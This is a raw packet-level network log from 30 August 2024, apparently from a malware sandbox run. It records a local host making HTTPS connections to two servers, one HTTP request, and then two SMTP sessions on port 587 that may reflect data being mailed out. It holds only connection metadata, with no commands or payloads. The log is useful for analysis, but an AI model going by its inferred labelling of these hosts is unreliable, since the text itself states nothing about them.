Aug 30, 2024 10:38:56.883315086 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.883328915 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.908922911 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.908938885 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.909018993 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.909050941 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.909308910 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.909328938 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.909486055 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.909497976 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.938932896 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.938951015 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939156055 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.939188957 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939322948 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939346075 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939380884 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.939392090 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939409018 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.939430952 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939445019 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939475060 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.939483881 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.939500093 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.939982891 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940036058 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.940037966 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940061092 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940100908 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.940211058 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940249920 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940269947 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.940279961 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.940294981 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.974864006 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.974898100 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.974965096 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.974999905 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.975018978 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.001337051 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.001353979 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.001466990 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.001494884 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.002352953 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.002377987 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.002410889 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.002429008 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.002441883 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030039072 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030061007 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030208111 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030235052 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030364990 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030406952 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030437946 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030447006 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030472040 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030550003 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030582905 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030606031 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030615091 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030635118 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030832052 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030857086 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030880928 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.030888081 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.030904055 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.031136036 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.031166077 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.031193018 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.031198978 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.031219006 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.064990997 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.065020084 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.065130949 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.065170050 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.090646982 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.090665102 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.090826988 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.090857983 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.090948105 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.090965033 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.091002941 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.091011047 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.091026068 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.091042042 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.091063023 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:57.091100931 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.094053984 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:57.467940092 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:57.467983007 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:57.468069077 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:57.468518019 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:57.468533039 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.372904062 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.373027086 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:58.376138926 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:58.376147032 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.376396894 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.377312899 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:58.420490980 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.946139097 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:58.997926950 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.082875013 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.082885981 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.082938910 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.082962990 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.082978010 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.083035946 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.083069086 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.083081961 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.083117008 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.083964109 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.083981991 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.084043980 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.084053040 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.084105968 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.219532967 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.219554901 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.219618082 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.219650984 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.219666958 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.219690084 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.220948935 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.220971107 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.221031904 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.221040964 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.221088886 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.355051041 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.355074883 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.355350018 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.355366945 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.355418921 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.490658045 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.490683079 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.490839005 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.490870953 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.490933895 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.491812944 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.491831064 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.491887093 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.491894007 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.491933107 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.492651939 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.492669106 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.492727041 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.492736101 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.492784023 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.626687050 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.626708031 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.626940966 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.626960039 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.627024889 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.627291918 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.627314091 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.627358913 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.627366066 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.627389908 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.627408028 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.761785030 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.761804104 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.761949062 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.761976957 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.762022972 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.762387991 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.762403965 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.762465954 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.762470961 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.762515068 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.763191938 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.763209105 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.763267994 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.763274908 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.763319969 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.764189959 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.764205933 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.764249086 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.764256954 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:38:59.764280081 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:38:59.764295101 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.033812046 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.033821106 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.033859968 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.033875942 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.033907890 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.033916950 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.033934116 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.033963919 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.034167051 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.034209967 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.034224033 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.034229994 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.034252882 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.034262896 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.169126987 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169154882 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169265032 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.169295073 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169425964 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.169440031 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169464111 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169500113 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.169508934 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.169529915 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.169545889 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.304543972 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.304567099 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.304698944 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.304728985 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.304779053 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.440817118 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.440839052 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.440886974 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.440922022 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.440938950 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.440957069 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.440979958 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.441035032 CEST	443	49706	78.142.208.13	192.168.2.8
Aug 30, 2024 10:39:00.441036940 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.441066980 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.441656113 CEST	49706	443	192.168.2.8	78.142.208.13
Aug 30, 2024 10:39:00.744627953 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:39:00.749413013 CEST	80	49707	208.95.112.1	192.168.2.8
Aug 30, 2024 10:39:00.749473095 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:39:00.750458002 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:39:00.755201101 CEST	80	49707	208.95.112.1	192.168.2.8
Aug 30, 2024 10:39:01.207411051 CEST	80	49707	208.95.112.1	192.168.2.8
Aug 30, 2024 10:39:01.247945070 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:39:02.318599939 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:02.324608088 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:02.324685097 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:02.930617094 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:02.931480885 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:02.937134027 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.246649027 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.246896029 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.251817942 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.425973892 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.433058977 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.437995911 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.613555908 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.613581896 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.613595963 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.613632917 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.617197037 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.622493982 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.797089100 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:03.841671944 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.850164890 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:03.855865955 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.031059027 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.076090097 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.089776039 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.094587088 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.268456936 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.268738031 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.273608923 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.480587006 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.482942104 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.488492966 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.671005964 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.671233892 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.676326036 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.852988958 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:04.853205919 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:04.858539104 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.032538891 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.033169985 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.033243895 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.033298016 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.033327103 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.038079977 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.038089991 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.038348913 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.038358927 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.482403040 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.529177904 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.541214943 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.545989037 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.721323967 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.721817970 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.721894979 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.721992016 CEST	587	49708	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.722034931 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.725208044 CEST	49708	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.726212978 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:05.732383013 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:05.733230114 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.299050093 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.299216032 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.304013014 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.475491047 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.524629116 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.603351116 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.603543997 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.609276056 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.779154062 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.779525042 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.784348965 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.955374002 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.955390930 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.955401897 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.955414057 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:06.955480099 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.955518007 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.976309061 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:06.981117010 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.150945902 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.157852888 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:07.162740946 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.332123041 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.332509041 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:07.338808060 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.508166075 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.508433104 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:07.513438940 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.899076939 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:07.901122093 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:07.906107903 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.075478077 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.075714111 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.080533981 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.250318050 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.250509024 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.255283117 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.424608946 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.426115036 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426181078 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426218987 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426254988 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426301956 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426337004 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426372051 CEST	49709	587	192.168.2.8	185.230.212.164
